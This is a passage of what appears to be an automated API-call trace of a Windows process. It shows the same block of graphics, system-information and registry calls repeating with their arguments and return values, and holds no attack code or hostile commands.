0x0 [0092.380] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.380] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.380] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.381] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.381] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.381] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcc0401d9 [0092.381] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xca0401dc [0092.381] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104784a [0092.381] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104784b [0092.381] CombineRgn (hrgnDst=0x104784a, hrgnSrc1=0xcc0401d9, hrgnSrc2=0xca0401dc, iMode=1) returned 1 [0092.381] CombineRgn (hrgnDst=0x104784b, hrgnSrc1=0xcc0401d9, hrgnSrc2=0xca0401dc, iMode=4) returned 2 [0092.381] CreateSolidBrush (color=0xff) returned 0x2107849 [0092.381] CreateSolidBrush (color=0xff0000) returned 0x110784c [0092.381] DeleteObject (ho=0x110784c) returned 1 [0092.381] DeleteObject (ho=0xca0401dc) returned 1 [0092.381] DeleteObject (ho=0xcc0401d9) returned 1 [0092.381] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.381] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.381] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.381] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.381] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.381] BeginPath (hdc=0x0) returned 0 [0092.381] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.381] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.381] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.381] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.381] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.381] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.381] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.381] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.382] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcb0401dc [0092.382] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcd0401d9 [0092.382] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104784d [0092.382] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104784e [0092.382] CombineRgn (hrgnDst=0x104784d, hrgnSrc1=0xcb0401dc, hrgnSrc2=0xcd0401d9, iMode=1) returned 1 [0092.382] CombineRgn (hrgnDst=0x104784e, hrgnSrc1=0xcb0401dc, hrgnSrc2=0xcd0401d9, iMode=4) returned 2 [0092.382] CreateSolidBrush (color=0xff) returned 0x210784c [0092.382] CreateSolidBrush (color=0xff0000) returned 0x110784f [0092.382] DeleteObject (ho=0x110784f) returned 1 [0092.382] DeleteObject (ho=0xcd0401d9) returned 1 [0092.382] DeleteObject (ho=0xcb0401dc) returned 1 [0092.382] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.382] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.382] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.382] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.382] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.382] BeginPath (hdc=0x0) returned 0 [0092.382] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.382] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.382] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.382] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.382] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.382] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.382] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.382] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.382] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xce0401d9 [0092.382] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcc0401dc [0092.382] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047850 [0092.382] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047851 [0092.382] CombineRgn (hrgnDst=0x1047850, hrgnSrc1=0xce0401d9, hrgnSrc2=0xcc0401dc, iMode=1) returned 1 [0092.383] CombineRgn (hrgnDst=0x1047851, hrgnSrc1=0xce0401d9, hrgnSrc2=0xcc0401dc, iMode=4) returned 2 [0092.383] CreateSolidBrush (color=0xff) returned 0x210784f [0092.383] CreateSolidBrush (color=0xff0000) returned 0x1107852 [0092.383] DeleteObject (ho=0x1107852) returned 1 [0092.383] DeleteObject (ho=0xcc0401dc) returned 1 [0092.383] DeleteObject (ho=0xce0401d9) returned 1 [0092.383] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.383] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.383] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.383] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.383] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.383] BeginPath (hdc=0x0) returned 0 [0092.383] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.383] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.383] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.383] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.383] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.383] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.383] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.383] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.383] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcd0401dc [0092.383] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcf0401d9 [0092.383] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047853 [0092.383] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047854 [0092.383] CombineRgn (hrgnDst=0x1047853, hrgnSrc1=0xcd0401dc, hrgnSrc2=0xcf0401d9, iMode=1) returned 1 [0092.383] CombineRgn (hrgnDst=0x1047854, hrgnSrc1=0xcd0401dc, hrgnSrc2=0xcf0401d9, iMode=4) returned 2 [0092.383] CreateSolidBrush (color=0xff) returned 0x2107852 [0092.383] CreateSolidBrush (color=0xff0000) returned 0x1107855 [0092.383] DeleteObject (ho=0x1107855) returned 1 [0092.383] DeleteObject (ho=0xcf0401d9) returned 1 [0092.383] DeleteObject (ho=0xcd0401dc) returned 1 [0092.383] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.383] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.384] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.384] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.384] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.384] BeginPath (hdc=0x0) returned 0 [0092.384] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.384] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.384] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.384] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.384] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.384] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.384] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.384] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.384] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd00401d9 [0092.384] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xce0401dc [0092.384] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047856 [0092.384] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047857 [0092.384] CombineRgn (hrgnDst=0x1047856, hrgnSrc1=0xd00401d9, hrgnSrc2=0xce0401dc, iMode=1) returned 1 [0092.384] CombineRgn (hrgnDst=0x1047857, hrgnSrc1=0xd00401d9, hrgnSrc2=0xce0401dc, iMode=4) returned 2 [0092.384] CreateSolidBrush (color=0xff) returned 0x2107855 [0092.384] CreateSolidBrush (color=0xff0000) returned 0x1107858 [0092.384] DeleteObject (ho=0x1107858) returned 1 [0092.384] DeleteObject (ho=0xce0401dc) returned 1 [0092.384] DeleteObject (ho=0xd00401d9) returned 1 [0092.384] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.384] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.384] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.384] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.384] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.384] BeginPath (hdc=0x0) returned 0 [0092.384] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.384] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.384] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.384] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.384] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.384] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.384] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.384] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.385] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcf0401dc [0092.385] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd10401d9 [0092.385] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047859 [0092.385] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104785a [0092.385] CombineRgn (hrgnDst=0x1047859, hrgnSrc1=0xcf0401dc, hrgnSrc2=0xd10401d9, iMode=1) returned 1 [0092.385] CombineRgn (hrgnDst=0x104785a, hrgnSrc1=0xcf0401dc, hrgnSrc2=0xd10401d9, iMode=4) returned 2 [0092.385] CreateSolidBrush (color=0xff) returned 0x2107858 [0092.385] CreateSolidBrush (color=0xff0000) returned 0x110785b [0092.385] DeleteObject (ho=0x110785b) returned 1 [0092.385] DeleteObject (ho=0xd10401d9) returned 1 [0092.385] DeleteObject (ho=0xcf0401dc) returned 1 [0092.385] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.385] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.385] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.385] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.385] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.385] BeginPath (hdc=0x0) returned 0 [0092.385] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.385] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.385] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.385] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.385] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.385] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.385] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.385] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.385] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd20401d9 [0092.385] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd00401dc [0092.385] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104785c [0092.385] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104785d [0092.385] CombineRgn (hrgnDst=0x104785c, hrgnSrc1=0xd20401d9, hrgnSrc2=0xd00401dc, iMode=1) returned 1 [0092.385] CombineRgn (hrgnDst=0x104785d, hrgnSrc1=0xd20401d9, hrgnSrc2=0xd00401dc, iMode=4) returned 2 [0092.385] CreateSolidBrush (color=0xff) returned 0x210785b [0092.385] CreateSolidBrush (color=0xff0000) returned 0x110785e [0092.385] DeleteObject (ho=0x110785e) returned 1 [0092.385] DeleteObject (ho=0xd00401dc) returned 1 [0092.385] DeleteObject (ho=0xd20401d9) returned 1 [0092.385] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.385] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.386] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.386] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.386] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.386] BeginPath (hdc=0x0) returned 0 [0092.386] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.386] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.386] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.386] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.386] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.386] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.386] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.386] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.386] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd10401dc [0092.386] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd30401d9 [0092.386] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104785f [0092.386] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047860 [0092.386] CombineRgn (hrgnDst=0x104785f, hrgnSrc1=0xd10401dc, hrgnSrc2=0xd30401d9, iMode=1) returned 1 [0092.386] CombineRgn (hrgnDst=0x1047860, hrgnSrc1=0xd10401dc, hrgnSrc2=0xd30401d9, iMode=4) returned 2 [0092.386] CreateSolidBrush (color=0xff) returned 0x210785e [0092.386] CreateSolidBrush (color=0xff0000) returned 0x1107861 [0092.386] DeleteObject (ho=0x1107861) returned 1 [0092.386] DeleteObject (ho=0xd30401d9) returned 1 [0092.386] DeleteObject (ho=0xd10401dc) returned 1 [0092.386] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.386] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.426] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.426] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.426] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.426] BeginPath (hdc=0x0) returned 0 [0092.426] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.426] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.426] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.426] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.426] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.426] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.426] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.426] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.427] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd40401d9 [0092.427] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd20401dc [0092.427] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047862 [0092.427] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047863 [0092.427] CombineRgn (hrgnDst=0x1047862, hrgnSrc1=0xd40401d9, hrgnSrc2=0xd20401dc, iMode=1) returned 1 [0092.427] CombineRgn (hrgnDst=0x1047863, hrgnSrc1=0xd40401d9, hrgnSrc2=0xd20401dc, iMode=4) returned 2 [0092.427] CreateSolidBrush (color=0xff) returned 0x2107861 [0092.427] CreateSolidBrush (color=0xff0000) returned 0x1107864 [0092.427] DeleteObject (ho=0x1107864) returned 1 [0092.427] DeleteObject (ho=0xd20401dc) returned 1 [0092.427] DeleteObject (ho=0xd40401d9) returned 1 [0092.427] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.427] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.427] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.427] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.427] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.427] BeginPath (hdc=0x0) returned 0 [0092.427] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.427] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.427] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.427] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.427] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.427] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.427] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.427] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.427] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd30401dc [0092.427] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd50401d9 [0092.427] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047865 [0092.427] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047866 [0092.427] CombineRgn (hrgnDst=0x1047865, hrgnSrc1=0xd30401dc, hrgnSrc2=0xd50401d9, iMode=1) returned 1 [0092.427] 